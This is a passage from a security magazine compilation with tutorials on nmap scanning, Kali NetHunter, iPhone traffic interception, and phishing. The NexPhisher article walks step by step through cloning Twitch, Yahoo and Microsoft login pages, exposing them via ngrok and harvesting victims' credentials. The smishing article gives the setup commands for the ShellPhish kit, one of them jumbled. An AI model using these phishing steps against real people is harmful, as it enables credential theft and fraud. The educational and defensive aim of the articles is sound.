In the case of the C language, you can use the ‘i686-w64-mingw32-gcc’ tool to convert the script into an executable
file, as we can see below.
i686-w64-mingw32-gcc -o exploit.exe exploit.c
I encourage you to investigate how to convert other languages’ scripts into executable files, such as Python or Perl.
Our work from this point will be to execute and try exploits to obtain elevation of privileges, such as we could see
previously.
Conclusion
In the ethical hacking world, there are hundreds of methods and techniques to learn. In this article, we have only seen a
global vision of a manual penetration test with a resume of the more interesting and useful tools.
The real intention is to show how an ethical hacker is able to hack systems with a few basic techniques. However, the real
secret is to be patient and to be eager to learn and investigate continuously.
190
If you are interested in this topic, you can practise on a lot of free platforms such as Hack the box or Vulnhub or, even,
participate in CTF challenges. I encourage you to do it!
References
1. https://github.com/21y4d/nmapAutomator
2. https://github.com/Tib3rius/AutoRecon
3. https://nmap.org/
4. https://www.openvas.org/
5. https://www.zaproxy.org/
6. https://es-la.tenable.com/products/nessus
7. https://github.com/scipag/vulscan
8. https://github.com/vulnersCom/nmap-vulners
9. https://www.exploit-db.com/
10. https://www.exploit-db.com/searchsploit
11. https://github.com/rapid7/metasploit-framework
12. https://www.offensive-security.com/metasploit-unleashed/msfvenom/
13. https://github.com/mzet-/linux-exploit-suggester
14. https://github.com/rebootuser/LinEnum
15. https://github.com/sleventyeleven/linuxprivchecker
About the Author
191
References
16. https://github.com/AonCyberLabs/Windows-Exploit-Suggester
17. https://github.com/rasta-mouse/Sherlock
18. https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
192
NMAP, THE
PERFECT
TOOL
DANIEL GARCÍA BAAMEIRO
Daniel García Baameiro is passionate about hacking. A computer engineer
from the Complutense University, he holds a master's degree in
cybersecurity from the Carlos III University and is certified by the OSCP.
During his professional career, he has dedicated himself exclusively to the
offensive side.
Currently, he teaches the subject "Offensive Security" at the International
Graduate School and works as a Red Team for the company ISDEFE.
If you liked the article, don't hesitate to give him feedback! He will
appreciate it very much: daniel@garciabaameiro.com
His website is the following: http://garciabaameiro.com
194
NMAP, The Perfect Tool
DEDICATION
I would like to dedicate this article to Erik, a great hacking and free culture enthusiast. In fact, it was thanks to him that I
got to know Hakin9 magazine. Never stop learning!
INTRODUCTION
When I decided to write this article under the theme proposed by the Hakin9 team of "Best tools and techniques for
hackers", my first thought was "nmap". This tool, key in a cybersecurity arsenal, allows information to be gathered about an
asset. This information can be gathered by scanning ports, detecting the operating system or even obtaining information
about the services present on a device.
This article is oriented both for those who have never performed a port scan before and for those who are performing an
offensive security certification such as the well-known OSCP. After reading it, the reader will be able to understand what
the tool does with each type of scan and how to adapt them accordingly.
PORT SCANNING
When we talk about ports in computing, also known as network ports or system ports, we are talking about a feature of
operating systems to create connections between devices and exchange information over a network. These connections can
be multiple and simultaneous, since after all the IP address of the device is the same but is addressed to different ports.
These ports are indicated through the network segments of the transport layer (following the OSI model), in which two data
transmission protocols known as TCP and UDP can be found.
TCP scanning
TCP, known as Transmission Control Protocol, is a connection-oriented network protocol. Simply put, for every packet sent
to a remote device, it is expected to receive another packet from the remote device indicating that it has received it. To
understand the types of scans that are performed with the nmap tool on this protocol, it is important to understand and
know its network segment.
TCP frame segment
A segment of a TCP/IP frame includes the application layer information together with a layer added by the transport
protocol. This segment is located inside the IP protocol segment. Visually, it looks like this:
195
Image from: https://upload.wikimedia.org/wikipedia/commons/d/da/TCP_header.png
Within this image, the field reserved for the segment flags has been highlighted. By using these flags, it is possible to
indicate with a packet that you want to establish a connection, confirm the reception of a packet, terminate a connection,
etc. The most important flags, or at least the ones to be taken into account, are listed below:
SYN: This flag is set when a new connection is to be initiated. For example, in a 3-way connection, a client sends a
TCP packet with the SYN segment active. After that, it gets a response from the server indicating that it has
received it and wants to establish a connection, so that information can be exchanged, with a TCP packet with the
SYN+ACK flags active. Finally, the client responds with a TCP packet with the ACK flag active, confirming that
communication has been initiated and data can be exchanged.
FIN: This flag is set when a new connection is to be terminated. As an example, a 3-way connection closure works
in the same way as described above, but replacing the SYN flag with the FIN flag.
ACK: This flag is used to indicate the reception of a packet.
RST: This flag is triggered when an unexpected packet is received. It should be noted that an end of connection is
also indicated by the use of this flag.
PSH: This flag indicates to the server to read the received packets without buffering them.
URG: This flag is used to indicate a certain priority for the packets. This flag has been discarded over time.
TCP scan
Having understood the distribution of a TCP segment with its respective flags and the establishment and termination of a
connection, it is time to understand the different types of scans offered by the nmap tool for analysing TCP ports.
The first of the basic scans, which is executed by default when no scan is indicated, is the one that emulates a connection
establishment request, without actually sending a response to the server when it issues a responding packet. For this, a TCP
segment with the SYN flag active is sent from the attacking machine to the victim machine. The nmap option to use would
be "-sS". Visually on a network, you would see a result similar to the one shown below:
196
The second of the recommended scans also emulates a connection initiation request, emitting a final response to the server.
This option is flagged with "-sT". Its execution and result can be seen in the following image:
Opposite to the connection break is the third scan, which seeks to emulate a connection closure. For this option, the "-sF"
flag is used. This scan, along with the next three mentioned below, tends to be among the least used in the enumeration
phase.
As for the fourth scan, a TCP packet is sent but no flag is associated with it. If there is no response, it may be an open or
filtered port. If it responds, it is confirmed that it is closed. This type of scan is mainly used to detect if a port is closed,
rather than to detect if a port is open.
On the other hand, the fifth scan presents a similar behaviour to the one mentioned in the previous paragraph, since in this
case it obtains the same response, but sending a packet with more than one active flag in the request. Specifically, the
"FIN", "PSH" and "URG" flags are activated. Its execution and result can be seen in the following image:
197
Finally, ACK scanning is presented, i.e. scanning by sending confirmation of packet reception to the other servers. Through
this scan it is not possible to detect whether a port is open or closed. Its functionality serves to determine whether there are
security measures implemented by the organisation, such as firewalls.
It should be noted that it is possible to customise our own scan by activating the flags that are considered through the
"--scanflags" functionality. At the same time, it is important to point out that there are more types of scans (such as -sO,
-sM- sW, etc.), but the ones described above are the most useful in the enumeration phase.
UDP scanning
In contrast to the TCP protocol mentioned in the previous section, the UDP protocol is not connection oriented, so it is not
necessary to use flags to, for example, initiate or terminate a connection. This is why the nmap tool only presents one type
of scan for UDP-based services. Its execution and result can be seen in the following image:
It is important to take into account, especially in order to enumerate an asset properly, that several types of scans have to be
performed. This does not mean that these types only refer to the TCP protocol, but that they
198
should be oriented to the different protocols and services available to an asset. At the author's recommendation, do not
forget to perform this scan.
ASSET INFORMATION GATHERING
In the previous section, we have seen how to list the open, closed or filtered ports offered by a device, but what if we want to
know what service is behind it? What if we want to determine the operating system? The nmap tool has functionalities for
this. The following sections explain how to obtain this information.
Scanning of services with their versions
On the one hand, through nmap, it is possible to detect which programs are associated with each service and port. In fact,
not only that, but nmap can even obtain the version of each of the services.
Of course, certain cases must occur in order to obtain the service and its associated version. If these cases do not occur, a
false positive may be obtained or the service associated with its respective ports may not be detected at all. In order to
perform this type of scan, the "-sV" flag must be used.
Once a scan has been performed with this flag, the result is a response similar to the one shown below:
Scanning the operating system
On the other hand, it is possible to obtain an approximation or probability of the operating system behind a device. In many
cases, this approximation coincides with reality, but false positives or errors can also occur. In order to perform such a scan,
the "-O" flag must be used.
Once a scan has been performed with this flag, the result is a response similar to the one shown below:
199
NMAP SCRIPTS
Over time, new functionalities have been added to the tool since it was first released. Among these functionalities is the
execution of scripts. These scripts not only aim at enumerating asset information, but may also include an exploit part. This
is why care must be taken when launching these scripts against an asset, knowing at all times what is being executed.
In GNU/Linux distributions, the path to these scripts is found in "/usr/share/nmap/scripts". These scripts are developed in
LUA, so it tends to be easy to create your own scripts. To list all scripts, the following command "locate *.nse" can be run in
a GNU/Linux terminal.
It is recommended that the reader investigate and explore in depth all the scripts offered by this tool, keeping those that can
be most useful to him/her.
200
Vulnerability detection
Among all the scripts, there is one that is highly recommended and stands out, referenced by the name "vuln". This script
allows detecting vulnerabilities in services and, if it detects one, exposes its associated CVE. Knowing the associated CVE
makes it possible to search for a public exploit, advancing in the pentesting phase. As an example, the use of this
functionality is shown below using the command "nmap --script vuln", which produces a result similar to the one shown
below:
Default scans
There is also a feature of this tool that allows scanning both the operating system and its services and versions at the same
time, also executing the scripts of the "scanning" category. The flag to make use of this functionality in attacks is "-A". As an
example, the following example shows the use of the command "nmap - A", which produces a result similar to the one
shown below:
201
AUTHOR'S RECOMMENDATION
During all my cyber security exercises, I have always employed different types of scanning against all assets in a network.
The goal is always to enumerate as many as possible. Of course, one has to keep in mind that performing a port scan,
especially if you are detecting services or vulnerabilities, generates a lot of network traffic. It is important to be aware of all
the features of the nmap tool, because there are techniques to make it difficult for Blue Teams to detect our scans. But that's
for another article!
CONCLUSION
In this article, we have been able to go through the main scans, indicating their differences and categorising them according
to whether they are port, service, operating system or vulnerability oriented. It is important to emphasise that it is not
enough to launch just one type of scan, but that multiple scans must be launched. At the same time, it is imperative that
these scans perform both TCP and UDP port enumeration. Also, the noise generated in a network must be taken into
account, especially if you want to carry out exercises where the person pretending to emulate being an attacker wants to go
unnoticed.
References
https://nmap.org/docs.html
202
KALI
NETHUNTER:
FOR THOSE
THAT HAVE A
FEAR OF
COMMITMENT
ATLAS STARK
Atlas Stark is a security researcher at Stark Industries Inc. with
16+ years in the technology industry. Currently providing cyber
security solutions and OSINT services to anti-human trafficking
non-profits that aid in investigation and victim recovery. He also
consults with state level law enforcement agencies concerning
hacking related incidents. He splits his time between California
and Tennessee.
Please email stark@starkinternational.se with any questions or
concerns.
204
Kali NetHunter: For Those That Have A Fear Of Commitment
INTRODUCTION:
Do you have a fear of commitment? Are you growing tired of the phrase “Got Root?” Are you driving yourself mad with all
of the root your phone tutorials and bad apps? If you answered yes to any of these questions then this is the article for you.
Whether you are new to penetration testing or a veteran in the biz, you will find some valuable knowledge in this article and
perhaps a new weapon to add to your arsenal. After reading this article you will be able to pick up any stock device and get
Kali NetHunter up and running.
Kali NetHunter is an extremely valuable tool and a game changer within the world of mobile penetration platforms. It is
also more conveniently within reach than you might think. I have specifically chosen the rootless version of Kali NetHunter
for this article because of how approachable it is; if you can utilize basic functionalities of a smartphone then you can
implement this tool. The best part is that the only equipment items needed are a standard issue smartphone, charging
cable, and a positive attitude.
LANDSCAPE:
The current landscape of office environments, shared work-spaces and cafes today are bustling with traffic from a variety of
devices including smartphones, watches, tablets, and more. Many of these devices are being utilized with little to no
security measures in mind. Today, within organizations around the world, you will find a mixed bag of these items being
utilized at a fast growing rate, from employees to the top level executives; the use of mobile machines is here to stay and we
need a competent way to test these environments.
INSTALLATION
Installation of the rootless version of Kali NetHunter only takes a few moments. Just follow the steps below and, before you
know it, you will be up and running with Kali NetHunter. (I would suggest keeping the phone on the charger during
setup.)
1. Navigate to https://store.nethunter.com/en/ and install the NetHunter store app.
2. Once downloaded, install Termux, NetHunter-KeX Client, and Hacker’s Keyboard from the store interface. (The
hacker’s keyboard is optional, however it does make typing from your device super simple.)
3. Open the Termux interface and enter the commands found in the Step 3 figure.
205
As you can see from the image in step one, you can scan the QR code or directly download the store app. Either way it works
with the same result, ultimately the choice is yours.
206
Tip:
In step two, you can use the NetHunter store’s search feature to find Termux if it is not present on the main interface. Just
look for the magnifying glass in the top right corner of the store interface.
Once you are done with the installation, you are greeted with “NetHunter for Termux installed successfully”. What I also
find extremely helpful is that the additional commands are listed after a successful installation on the command line. See
the image from Step 3a.
Here are some additional commands you can use within the NetHunter Termux.
207
TOOLS:
At this point, you should have the rootless version of Kali NetHunter installed on your standard issue Android device, ready
to explore the environment, so we will move into some of the tools and functionality of NetHunter. (Please use the tools
wisely.)
HackRF
You can use NetHunter with your HackRF One from Great Scott Gadgets to test RF Systems. HackRF One is a great open
source tool for developing and testing modern radio technologies.
NMAP
Nmap works as expected and is an open-source network scanning utility used by the vast majority of security professionals.
Having Nmap at your fingertips on a mobile device opens up a world of possibilities on your next engagement.
AdvPhishing
I installed this tool through the NetHunter Termux shell. AdvPhishing is used to create phishing pages for a variety of
services. More on this particular framework at a later date, due to the dynamic nature of the application. I have provided a
link so you can explore it on your own as well, the resource is located in the references and links section.
208
Metasploit
MSF console does work on the rootless version of NetHunter with the exception of database support. You are still able to
explore the framework as well as list the many payloads that come with the Metasploit framework. (Metasploit has a lot of
features and is worth exploring further.)
209
These are just a few tools to get you started using NetHunter and believe me, there are a lot of them that have a multitude of
feature rich environments. As we have barely scratched the surface concerning a few of the tools listed, now it’s time to
explore the platform further.
ENVIRONMENT:
As you explore the environment, you are met with a clean and straightforward interface featuring apps that are available for
you to download and try. When you select an app or feature from the store it loads additional information to help guide
your decision. The screenshots and explanations provided about the tools are an invaluable resource with a vault of insight.
If you can’t find a certain app or plugin there is a floating magnifying glass that is there to assist you when you need it. One
of the features I really like about the amount of detail is that the application tells you if root permissions or a rooted device
is required to continue. Apps will also let you know if the application will function properly within the current configuration
of the device. Each time you engage the NetHunter store app it checks the repository for updates, which is extraordinarily
helpful being that keeping apps up to date is a critical step in maintaining a secure working infrastructure. The Nearby
feature is really handy too as long as at least two parties have the NetHunter Store app installed. The Nearby feature allows
you to swap apps and tools from one user’s device to another via Bluetooth or WiFi - cool, right? As you can see, NetHunter
has a variety of rich resources to offer.
210
USE CASE:
As stated already, Kali NetHunter is a mobile penetration testing platform. The framework is exceptionally valuable during
engagements that involve social engineering. Being able to utilize a variety of phishing technologies, card-cloning and
scanning techniques to test the workforce and resources in an organization provides the professional with a wealth of
knowledge concerning vulnerabilities that could compromise critical systems within the business; with this knowledge,
both the professional and the administration can work together to devise and implement systems that will strengthen the
overall security. Being able to exploit the human element in any organization is an exceptionally sweet commodity.
ROOTING:
Now I agree that being able to root your device is a cool skill to have as a pentester and it does open up the platform to its
full functionality and purpose, but as for exploring NetHunter with no strings attached, the rootless version makes for an
attractive alternative, especially to new pentesters with limited industry experience or for the individuals that do not wish to
root their device.
Another reason the rootless version was chosen was the ebb and flow of the information out there concerning rooting a
device. Message forums and tech boards are full of conflicting information about the best way to root any number of
Android devices, terminal crashes and conflicting drivers, so with the heavy amount of back and forth, and to not confuse
the reader of this article, we chose the approachable rootless version of Kali NetHunter, plus your device is more like an
investment these days and you retain your warranty by choosing this option. Another major advantage to the rootless
version is that if you are not digging it, then just delete it and move on, that alone is priceless.
211
HANDS-ON EXAMPLE
As you have already discovered from the article, Kali NetHunter is not only a valuable tool with many functions, it is also
highly versatile and adaptable to any environment. Following is a short hands on example using the tool Wigle Wifi, which
is available in the NetHunter store. As a reminder, we are utilizing the rootless version of Kali NetHunter.
WIGLE WIFI
In this example, we will pretend we are implementing a “pushing on the fence” scenario for XYZ Organization that hired
you to perform penetration testing and security analysis. Pushing on the fence is when your goal is not to gain access to the
inner sanctum of the company, but to socially exploit the gatekeeper like a front desk attendant while you perform scans
from within the facility. Wigle Wifi is really convenient for this type of interaction because you can execute it simply without
needing to submit arguments in a mobile shell. Below are some screenshots for this hands-on interaction.
Execute Wigle Wifi from the NetHunter dashboard
212
Application immediately starts scanning the area upon execution.
213
Even if the bssid is hidden, you can search for any network name that the application detects.
214
Results from the search; as you can see now you have the bssid.
Menu that allows you to choose several options, you can exit the application from the menu as well. (Tip: Once you are
done with the tool, it is highly advisable to exit the tool to stop the capturing process.)
215
For this example, we chose to navigate to our Dashboard from the menu. A wealth of information can be had from this
section. I have outlined some of the things I like about the organization.
1. Very quickly I know how many new connections from which sources are being detected.
2. GPS information is priceless in any engagement.
3. Run and Scan duration are a great way to measure the effectiveness of your tool.
I know that was fast, however it really is that straightforward. I would use the information that was gathered during this
scenario to create some files that I could quickly pass to other applications in post follow up, every second counts when we
are using a mobile device. Trust me, any form of automation we can stage in the beginning will make the encounter with the
theater run that much smoother.
216
We utilized Wigle Wifi without being logged in, I have added some extra content below as a guide if you would like to create
an account.
This is where you will want to register for a new account.
I absolutely love the fact that you do not have to use real information.(Tip: If you use fake credentials, a word to the wise
would be to remember them, I have been burned many times.)
217
CONCLUSION:
In closing, after you have experimented with this version of NetHunter for awhile and find yourself wanting more, like I
did, I would highly suggest you invest the time and effort and root one of your older devices or try to find a device model
listed on the Kali NetHunter website. This article is meant to provide a high level view of Kali NetHunter not a deep dive
into the abyss. Please take a look at the resources provided under web references and links to enhance your understanding
and assist you if you get stuck along the way. Happy Hacking!
On the Web References and Links:
1. https://www.kali.org/docs/nethunter
2. https://www.kali.org/kali-nethunter
3. https://www.kali.org/docs/general-use/metapackages
4. https://www.kali.org/docs/troubleshooting/common-minimum-setup
5. https://www.kali.org/docs/nethunter/nethunter-rootless
6. https://github.com/Ignitetch/AdvPhishing
Helpful Article:
This article may help you out in deciding if you think the pain of rooting is worth it. It also offers some
helpful insight and thought provoking reflection.
https://www.bullguard.com/bullguard-security-center/mobile-security/mobile-threats/android-rooting
-risks.aspx
218
INTERCEPTING
DATA TRAFFIC
VIA
IPHONE
JORDAN BONAGURA
• CISO and Information Security Researcher - CEH
• Hacker is NOT a Crime Advocate
• Stay Safe (Magazine and Podcasts) Founder
• Computer Scientist
• Post Graduated - Strategic Business Management, Higher Education Methodology Innovation and
Research Methodology
• Organizer of Vale Security Conference - Brazil
• Director Member of Cloud Security Alliance - Brazil
• Advisory Member of Digital Law and High-Tech Crimes OAB (Association of Brazilian Lawyers)
• IT Teacher and Course Coordinator
• SJC Hacker Space Founder
• Speaker (AppSec California, GrrCon, Angeles y Demonios, BSides Augusta, BSides SP, BalCConf2k14,
H2HC, SegInfo, ITA, INPE, CNASI, RoadSec etc.)
220
Intercepting Data Traffic Via IPhone
INTRODUCTION
This article aims to demonstrate, in a simplified way, a different approach for capturing and intercepting network
traffic data originating from an iPhone device.
Obviously, the iPhone is not the only device subject to these approaches, and the strategies presented here are not
the only ones capable of performing such intercepts.
The simplest way to get this data is to use a proxy server. In the first part of this article, we will adopt BURP
software to exemplify this operation. After collecting the data, we will analyze the packages of a given application
and its connection to the WEB services.
However, if the objective is a more detailed analysis of the traffic of an application that uses communication ports
other than WEB requests, we can diversify the strategy and use a remote virtual interface (RVI), as we will
demonstrate in the second part of this article.
PART 1 - USING A PROXY SERVER – BURP
When we mention the use of a proxy server, we are basically referring to intercepting and analyzing requests
related to the HTTP (Hypertext Transfer Protocol), whether the one with the TLS (Transport Layer Security)
security layer or not.
Some of the applications we have on our smartphones still only use the HTTP protocol, which means that data
travels in plain text form, that is, without any encryption, making sensitive information fully exposed to any
attacker who adopts techniques like man in the middle.
To configure our proxy, the first step is to open BURP software, by default the interface it will be listening to will
be the equipment itself, that is, the IP address 127.0.0.1 and port 8080, as we can see in the image below:
221
In BURP, every capture is by default related to the local machine, but to execute our strategy of intercepting the data that
will reach our server through the iPhone, we will need to add the internal IP of the local machine in the Specific address
field.
Note that in this case we adopt the IP 192.168.1.102 with port 8081. Once BURP is configured, let's go to the iPhone:
222
Note: The IP address associated with the iPhone has no relationship with the proxy server, but it is obvious that
they will have to be on the same network so that traffic can be captured.
As soon as we finish configuring the iPhone to use BURP as our proxy server, we can already see some packages, this is
because several applications are running in the background, usually software updates, email updates, among others. Below
we have an example of an intercepted packet with POST method in connection with Office365 for email update. Note that
DeviceType is already identified as an iPhone.
For demonstration, we used a real healthcare application, more precisely from a healthcare company, and for
ethical reasons, I obviously kept the data hidden.
223
We can analyze that when we open the application on our smartphone, API requests to the server are already
executed to exchange information and with this we have already seen the packages as shown in the image below:
Despite being an application that requires a high level of information secrecy, data is transferred in plain text, so
that means without any encryption involved.
As we can see in the image below, we are not yet talking about access credentials, but in any case, they are sensitive
data, such as the beneficiary number (insurance ID) and telephone number.
224
Unfortunately, in this application, not only the previously highlighted sensitive data are transferred in plain text,
but also the access credentials (username and password) as we can see in the image below:
This means that if we had someone connected to the same network, for example an airport wifi network, cafeteria,
restaurants, etc., and were running a traffic analyzer where we opened this application, we would have our user and
password data leaked (Man in the middle attack).
PART 2 - USING A REMOTE VIRTUAL INTERFACE (RVI) – WIRESHARK
Another approach that can sometimes be more interesting is to analyze all the network traffic that occurs between the
iPhone device and the application servers, now not only focused on WEB applications and requests (HTTP), but on
different protocols.
To implement this, we start with the connection of our iPhone via USB to the computer that will run Wireshark for data
collection, then we will create the RVI (Remote Virtual Interface) where we will need to pass the UUID (Universal Unique
Identifiers) of the iPhone as a parameter.
Through "Finder" it is possible to discover the device UUID, just click on the name of the connected device and the
information will appear as shown in the image below:
Having the device UUID and being connected, it is necessary to activate the virtual interface (RVI), using the following
command:
225
After receiving the SUCCEEDED message, we are ready with the interface enabled and then we can go to the Wireshark
network traffic analyzer opening and select the rvi0 interface.
In this example, and even for comparison purposes with the previous model, we adopted the same healthcare application
and applied a basic filter (ip.src == 192.168.1.23) to facilitate viewing only the source IP (iPhone). It is possible to view
protocols from different layers of the OSI model. In this example, we have protocols from the transport layer (TCP)
as well as from the application layer (HTTP) as seen in the image below:
226
Analyzing only the HTTP packets, it is possible to analyze the same information that we saw previously in BURP.
So, if we open the content of our selected package, we will also have all the previously demonstrated credential
information, as shown in the image below:
CONCLUSION
227
We could verify that there are different approaches regarding the capture of data traffic via iPhone. In the first
part, we demonstrated the technique with the adoption of a Proxy server (BURP) where it was possible to analyze
packages related to WEB requests, this technique is easier to implement, but often limited. In the second part, we
demonstrated a broader analysis where it was possible to verify that protocols from different layers can also be
analyzed. Therefore, depending on the desired objective and/or the form of communication of the application, this
may be more suitable.
It is worth remembering that both techniques are complementary, therefore, depending on the application's final
analysis objective, both can be combined.
The path of the stones is given, now it's up to you to follow for an in-depth analysis of their applications.
Stay Safe
228
PHISHING
USING
NEXPHISHER
MAYUKH PAUL
I am a typical college student with a keen interest in the field of
cybersecurity and social engineering. The art of psychologically
manipulating people into performing actions or divulging
confidential information intrigues me.
I enjoy trying out new tools and exploiting new vulnerabilities.
The more vulnerabilities I exploit, my urge to learn increases.
I aim to dive more into the field of cybersecurity research and
protect company security against cyber threats.
230
Phishing Using Nexphisher
Phishing is a category of social engineering attack often used to trick a victim and steal their data, such as login credentials,
credit card details, PIN, etc.
Phishing takes place when an attacker deceives a victim into opening a malicious link through email, messages, etc., which
leads to a ransomware attack, installation of malware, and in most cases revealing sensitive information, which might lead
to huge losses. Such an attack might be very devastating to the user as it might lead to identity theft, unauthorized
purchases, or stealing of funds.
Some of the common types of phishing are:
• Spear Phishing: This type of phishing is mostly targeted to a specific group or individual.
• Whaling: This type of phishing attack is targeted to an employee in a high position, such as CEO, CTO, etc.
• Smishing: This attack is executed by using text messages or SMS.
• Vishing: This attack is executed over a voice call. Vishing is short for Voice Phishing.
• Search Engine Phishing: This type of phishing involves the attacker aiming to be the top search of a search
engine to trick a mass amount of users. Clicking on the link, the users are tricked into visiting their malicious
website.
Let me show you how easy it is to create a phishing page for various social media sites. Here I have NexPhisher, an
automated Phishing tool having 37-page templates. It also has five port forwarding options.
You can clone NexPhisher from here: https://github.com/htr-tech/nexphisher
To start up NexPhisher once installed we use the command ‘bash nexphisher’ as NexPhisher is written in shell.
NexPhisher has initial 30 templates of different social media.
231
Let’s try cloning a twitch page to phish for a twitch username and password.
Next, we get five port forwarding options:
LocalHost
Ngrok
Serveo
LocalXpose
232
LocalHostRun
Here, I select ngrok to host the phishing link globally.
NexPhisher creates a phishing page and initializes it to localhost, which gets forwarded to ngrok.
A phishing link is created that can be accessed and is generated, which can be sent to the victim.
The attacker can use various social engineer techniques to convince the victim to click on the link and enter their
credentials. Here, I used a link shortener to shorten the created link to make it look less suspicious.
233
Let’s take a look at the victim’s side. Once the victim opens the link, a well-cloned twitch page asking for login credentials is
seen.
The victim enters their credentials as asked.
234
On clicking on login, the victim gets redirected to the twitch account recovery page. The victim might be confused but there
are fewer chances of being suspicious.
The victim might try to login again or try following the recovery steps. While he/she does that, the attacker already has their
IP address and credentials.
235
You can find all the IP details in the ip.txt file.
In the logs folder, all the credentials of the phished victims are stored.
Let’s look into a few other templates. I chose Yahoo and selected the option localhost for this one.
236
A phishing page is created and the victim enters their credentials.
On trying to login, the victim gets redirected to the session expired page of Yahoo.
237
The attacker has the details by then.
Now, NexPhisher also works perfectly for a page like Microsoft or Xbox login, which has a separate page for email and
password. Let’s look into it…
The phishing link is created with ngrok.
238
The webpage looks genuine but the link doesn’t. The victim enters their email and password if social engineering is
successful.
239
On trying to login, the page gets refreshed to the actual login page of Microsoft. The victim tries to login a second time and
he will be successful thus, suspicion won’t arise.
By the same time, the attacker has successfully got the credentials.
240
Phishing is a common practice these days. People can avoid getting phished if they stay vigilant. Avoid opening suspicious
links and not entering credentials to untrusted websites.
241
SMISHING -
PHISHING
ATTACKS
THROUGH TEXT
MESSAGES
CLEBER SOARES
Enthusiast and researcher in Information Security adept at free
software culture, he has worked in the technology area for more
than 20 years, passing through national and multinational
companies. Has technical courses in Data Processing, graduated
in Computer Networks and some postgrad work in Ethical
Hacking and Cyber Security. Acts as Information Security
Analyst and Ad-hoc Forensic Computer Expert. Leader of the
OWASP Belém Chapter at the OWASP Foundation and author
at Hacker Culture.
243
DEIVISON FRANCO
CEO at aCCESS Security Lab. Master’s degrees in Computer Science and in
Business Administration. Specialist degrees in Forensic Science (Emphasis in
Computer Forensics) and in Computer Networks Support. Degree in Data
Processing. Researcher and Consultant in Computer Forensics and
Information Security. Member of the IEEE Information Forensics and Security
Technical Committee (IEEE IFS-TC) and of the Brazilian Society of Forensic
Sciences (SBCF). C|EH, C|HFI, DSFE and ISO 27002 Senior Manager. Author
and technical reviewer of the book “Treatise of Computer Forensics”.
Reviewer and editorial board member of the Brazilian Journal of
Criminalistics and of the Digital Security Magazine.
244
SMISHING - Phishing Attacks Through Text Messages
The world is evolving so fast that it's hard to keep up with all the new technologies. Thus, crimes committed through
technological devices are full of peculiarities that differ from conventional crimes. Phishing, for example, which is
fraudulently obtaining electronic data over the internet, is generally typified as embezzlement or qualified theft, the
consequences of which can open security breaches and cause damage to companies.
In this article, Smishing will be presented, a type of technological fraud, a variant of Phishing, as well as Spear Phishing,
Vishing, Offline Phishing, Dumpster Diving, Typosquatting, QR Code phishing, Pharming and Link Shorteners. This article
will clarify and help the target audience to know the possibilities of attacks it is exposed to and to position itself in front of
them, as well as ways to prevent and avoid them in the corporate use environment, or in the personal use environment.
THE ORIGIN OF PHISHING
On January 28, 1996, the term phishing emerged from an attempt to obtain Internet access credentials from employees of
the world's largest Internet provider, AOL-America Online, which distributed promotional floppy disks and CDs with some
hours of free internet access, making it quite popular.
In a forum called "AOL for free?", user mk590 posted the following sentence:
"What happens is that in the past, you could make a fake AOL account once you had a credit card generator. However,
AOL was smart. Now, after entering the card details, a check is done with the respective bank. Does anyone else know
any other way to acquire an account than through Phishing?"
At that time, to connect the dial-up internet to the digital world from the AOL provider, users had to register using their
credit card.
Cybercriminals starting to share a free distributed program called AOHell, having its first version released in 1994 by
unknown authors who generated random credit card numbers to perform the registration to open accounts, because AOL
did not carry out validation. As time went on, the company started to validate the numbers together with the credit card
companies.
245
Figure 1. AOHell program, managed AOL credentials and credit cards.
SPAM AND PHISHING: WHAT DO THEY HAVE IN COMMON?
The acronym Spam corresponds to “Sending and Posting Advertisement in Mass”. Making an analogy, we can say that it
would be those flyers, posters or a link offering some product. Spammers, as those in charge of this type of action are
known, have their main objective to propagate the greatest possible number of inopportune emails to various users, which
may be malicious or just sending advertisements for products and services, sometimes questionable, as having excessive
advantages.
Many email services have protections and provide reporting tools. However, according to Cert.br, the group responsible for
responding to and handling Internet Security Incidents in Brazil, maintained by NIC.br (Ponto BR Information and
Coordination Center), in 2019, 867,920 unwanted emails were reported.
246
Figure 2. Spams reported to CERT per year.
THE SMISHING
Smishing is one of the techniques used by cybercrime resulting from phishing, in which its meaning comes from the
combination of "SMS with phishing", which in turn uses text messages via SMS (Short Message Service) or applications’
cross-platform messaging, to disseminate various links with false news and information in an attempt to capture passwords
and personal information. In the following image, we have an example of the anatomy of an attack.
Figure 3. The anatomy of a smishing attack.
247
We have some classic examples of fraudulent SMS sending that, using financial institutions and renowned telephone
operators, request the Token update and still follow in the persuasive message followed by a tacit threat with the following
and other similar terms “avoid blocking of your account" "otherwise your account will be blocked".
Figure 4. Examples of fraudulent SMS.
Some streaming companies are also being used as bait. In the example below, the company Netflix was being offered for
"free", in which the user entered personal data by answering some questions in the registration. However, what was behind
the false advertisement was actually that the “free subscription” was used to sign a public petition to support and/or
overthrow governments, in addition to data theft. Another detail is that this same site has been adapted for other languages.
Figure 5. Link forwarded to technology group via WhatsApp with petition URLfound on the website.
248
Figure 6. Language detection script.
On December 31, 2019, the World Health Organization released the first warning of the emergence of the
coronavirus/COVID-19. Cybercrime soon took advantage of the opportunity to forward malicious links. They take
advantage of the general panic of the population with the search for basic items, such as alcohol gel and masks. In the
examples below, cybercriminals reported an alleged free distribution of alcohol gel using the name of a well-known
beverage company such as Ambev and financial aid aimed at specific low-income groups between R$600 and R$1,200,
where victims were redirected to perform registration. However, after you type in your information, they asked that it be
shared with a certain number of people or groups of cross-platform instant messaging applications.
Figure 7. Advertising image of the Ambev company.
249
Figure 8. Redirection URL and data retrieval.
Figure 9. Fraudulent advertising image on behalf of the alleged government aid.
TOOLS
Using the following tool(s) to attack targets without prior customary consent is illegal, users are responsible for complying
with all local laws.
This article is for educational and warning purposes, in which I am not responsible for any misuse, injury or damage
caused.
250
ShellPhish – It is one of the widely used open-source tools, which has become quite popular for phishing forwarding, to
obtain credentials such as id, password, having several versions, offers phishing web page templates for more than 29 social
media such as: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin and others.
The tool does not come by default on pentest distributions like Kali Linux or ParrotOS, which need to be downloaded from
the official github site.
Open your Terminal from your GNU-Linux system, choose a directory to download, in this article, you chose documents.
# git clone https://github.com/AbirHasan2005/ShellPhish.git
Next step, access the directory with the cd command in the ShellPhish directory. After accessing, list the contents of the
directory with the command ls -l.
# ShellPhish cd
# ls -l
Change the permission with the chmod +x command in the Shellphish.sh.
251
# chmod +x Shellphish.sh.
Now that the configurations are ready to use, let's run the shellphish tool by running the following command on your
terminal bash shellphish.sh or ./shellphish.sh. Also, run the command with root.
Figure 10. ShellPhish running.
